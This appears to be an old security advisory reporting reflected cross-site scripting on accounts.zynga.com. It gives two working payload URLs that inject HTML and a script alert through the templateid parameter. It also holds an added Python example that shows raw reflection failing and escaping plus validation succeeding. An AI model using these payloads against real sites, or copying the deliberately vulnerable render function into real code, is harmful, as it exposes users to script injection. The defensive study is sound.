The accounts.zynga.com site suffers from a cross site scripting vulnerability.
--------------------------------------------------------------------------------
Title: Zynga (accounts) Cross site scripting vulnerability
Vendor: www.zynga.com
Author: Raghavendra Karthik D (r007k17-w)
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: © 2011 Zynga, Inc
--------------------------------------------------------------------------------
* Cross Site Scripting vulnerability
Demo:
1. HTML injection:
http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E
2. JavaScript injection:
http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E
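Added example (not part of the original advisory and not Zynga's code): it shows why the %22%3E prefix in both demo URLs lets markup escape a quoted attribute, and how output encoding plus allow-list validation of templateid stops it. The HTML fragment, the numeric id format and every function name are assumptions, since the advisory does not show the server-side template.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two demo URLs from the advisory, used only as test input.
BASE = "http://accounts.zynga.com/?game=&unsub=11046&templateid="
DEMO_HTML = BASE + "%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E"
DEMO_JS = BASE + "%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E"

# Assumption: the parameter is echoed inside a double-quoted attribute.
FRAGMENT = '<input type="hidden" name="templateid" value="{}">'
# Assumption: legitimate template ids are short decimal integers.
TEMPLATE_ID_RE = re.compile(r"[0-9]{1,10}")

def get_param(url, name):
    """Percent-decode one query parameter, as a web framework would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(name, [""])[0]

def render_vulnerable(value):
    """Raw reflection: a '">' in the value closes the attribute and the tag."""
    return FRAGMENT.format(value)

def render_escaped(value):
    """Attribute-context encoding: quotes and angle brackets become entities."""
    return FRAGMENT.format(html.escape(value, quote=True))

def render_validated(value):
    """Allow-list first, encode second; None means reject the request."""
    if not TEMPLATE_ID_RE.fullmatch(value):
        return None
    return render_escaped(value)

class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(markup):
    """Start tags the parser sees beyond the one expected <input>."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags[1:]

if __name__ == "__main__":
    for url in (DEMO_HTML, DEMO_JS):
        v = get_param(url, "templateid")
        print(injected_tags(render_vulnerable(v)), injected_tags(render_escaped(v)))
```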
--------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and 3psilonlambda and all my friends.